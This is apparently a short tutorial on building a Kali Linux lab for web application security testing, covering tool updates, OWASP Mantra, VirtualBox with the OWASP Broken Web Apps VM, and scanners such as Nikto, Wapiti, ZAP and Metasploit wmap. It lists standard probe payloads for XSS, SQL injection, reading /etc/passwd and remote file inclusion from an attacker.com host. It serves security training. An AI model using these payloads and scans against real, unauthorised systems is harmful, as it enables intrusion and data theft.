Updating and Upgrading Kali Linux
Before starting web application security testing, ensure all necessary tools are up-to-date.
apt-get update
apt-get upgrade
apt-get dist-upgrade
Installing and Running OWASP Mantra
OWASP Mentra entegrates Mozilla Firefox with security plugins for testing web application vulnerabilities.
apt-get install owasp-mantra-ff
Configuring Iceweasel Browser
Customize Iceweasel (Firefox variant) with essential security testing plugins:
- Tamper Data
- Cookies Manager+
- Firebug
- Hackbar
- HTTP Requester
- Passive Recon
Setting Up VirtualBox for Vulnerable VMs
Install VirtualBox to create isolated testing environments:
apt-get install virtualbox
Creating Vulnerable Virtual Machines
Download and import OWASP BWA (Broken Web Apps) VM for practice:
wget http://sourceforge.net/projects/owaspbwa/files/OWASP_Broken_Web_Apps_VM_1.1.1.ova
Configuring Client Virtual Machines
Download Microsoft Windows VMs for client-side testing from:
http://dev.modern.ie/tools/vms/#downloads
Network Configuration for Virtual Machines
Set up host-only networking in VirtualBox for secure communication:
- Go to File > Preferences > Network
- Add a new host-only network (vboxnet0)
- Configure VM network adapters to use host-only mode
Web Application Vulnerability Identification
Cross-Site Scripting (XSS)
Test for XSS vulnerabilities by injecting script tags:
<script>alert('XSS')</script>
SQL Injection
Test for SQL injection vulnerabilities:
' OR '1'='1
File Inclusion Vulnerabilities
Test for local and remote file inclusion:
../../../../etc/passwd
http://attacker.com/malicious.txt
SSL/TLS Configuraton Testing
Use SSLScan to check for weak encryption protocols:
sslscan 192.168.56.102
Automated Scanning Tools
Nikto
Comprehensive web server scanner:
nikto -h http://target.com -o results.html
Wapiti
Web application vulnerability scanner:
wapiti http://target.com -o wapiti_results -f html
OWASP ZAP
Integrated penetration testing tool with scanning capabilities:
- Configure browser to use ZAP proxy
- Right-click target site > Attack > Active Scan
w3af
Web application attack and audit framework:
w3af_gui
Vega
Open-source web vulnerability scanner:
vega
Metasploit Wmap
Metasploit module for web application scanning:
msfconsole
load wmap
wmap_sites -a http://target.com
wmap_run -e